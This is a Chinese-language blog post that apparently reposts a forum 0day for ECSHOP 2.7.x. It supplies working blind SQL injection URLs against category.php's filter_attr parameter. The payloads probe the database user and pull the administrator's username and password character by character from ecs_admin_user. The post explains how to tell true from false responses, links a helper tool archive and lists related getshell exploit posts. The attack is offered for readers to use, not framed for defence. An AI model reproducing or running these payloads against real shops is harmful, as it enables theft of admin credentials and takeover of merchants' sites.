ECSHOP 2.7.X注入漏洞_20100507

2010, May 10, 11:21 AM. oday收藏
Submitted by admin

看到有人贴公告了...我就发几个poc吧......
反正是要臭街的东西了....

http://www.example.com/shop/category.php?page=1&sort=goods_id&order=ASC#
goods_list&category=1&display=grid&brand=0&price_min=0&price_max=0&filte
r_attr=-999
Test it :
http://www.example.com/shop/category.php?page=1&sort=goods_id&order=ASC%
23goods_list&category=1&display=grid&brand=0&price_min=0&price_max=0&fil
ter_attr=-999%20OR%20length(session_user())=14%20or%201=2 //判断session_user长度是否是14位
http://www.example.com/shop/category.php?page=1&sort=goods_id&order=ASC%
23goods_list&category=1&display=grid&brand=0&price_min=0&price_max=0&fil
ter_attr=-999%20OR%20length(session_user())=15%20or%201=2 //判断session_user长度是否是15位
http://127.0.0.1/category.php?page=1&sort=goods_id&order=asc&category=1&display=grid&brand=0&price_min=0&price_max=0&filter_attr=-999 OR ASCII(MID(UPPER((select password FROM ecs_admin_user WHERE user_id=1)),{inj},1))={inj} OR 1=2
第一个{inj}是要猜解密码的第几位.第二个是对应的ascii
 
ps:为啥我老用别人的马甲呢?rey这个马甲又登录不上去了.我很蛋疼啊,求关注
利用方法:
访问
[url]http://127.0.0.1/category.php?page=1&sort=goods_id&order=asc&category=1&display=grid&brand=0&price_min=0&price_max=0&filter_attr=-999%20OR%20[/url][color=Red]1=1[/color]%20OR%201=2
[url]http://127.0.0.1/category.php?page=1&sort=goods_id&order=asc&category=1&display=grid&brand=0&price_min=0&price_max=0&filter_attr=-999%20OR%20[/url][color=Red]1=2[/color]%20OR%201=2
可以看到网页的区别.可以抓取商品图片的链接作为关键字如
images/200905/thumb_img/9_thumb_G_1241511871555.jpg
爆用户名的语句为
[url]http://127.0.0.1/category.php?page=1&sort=goods_id&order=asc&category=1&display=grid&brand=0&price_min=0&price_max=0&filter_attr=-999[/url] OR ASCII(MID(UPPER((select user_name FROM ecs_admin_user WHERE user_id=1)),{inj},1))={inj} OR 1=2
其他的...大家就灵活运用吧
来源:t00ls

附件: helper.rar (6.03 K, 下载次数:150)

« 上一篇 | 下一篇 »

只显示10条记录相关文章
ecshop最新版 (v272) 本地包含拿SHELL (浏览: 18573, 评论: 0)
ecshop后台获取shell最新方法,通杀最新版本&后台低权限 (浏览: 18168, 评论: 0)
ecshop最新版(v272) 本地包含漏洞ODAY(鸡肋) (浏览: 16092, 评论: 0)
ECshop 支付方式注射 0day (浏览: 14385, 评论: 0)
ecshop v2.72 前台写shell漏洞 (浏览: 12202, 评论: 0)
ecshop2.72鸡肋注入 (浏览: 11148, 评论: 0)
ecshop 通杀2.6*2.7 GBK版本 oday 爆路径 GetShell (浏览: 13013, 评论: 0)
ecshop后台拿shell的又一种方法 (浏览: 13922, 评论: 0)
ecshop SQL注射漏洞0821 0day (浏览: 11164, 评论: 0)
关于access sql 偏移注入 (浏览: 10911, 评论: 0)
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):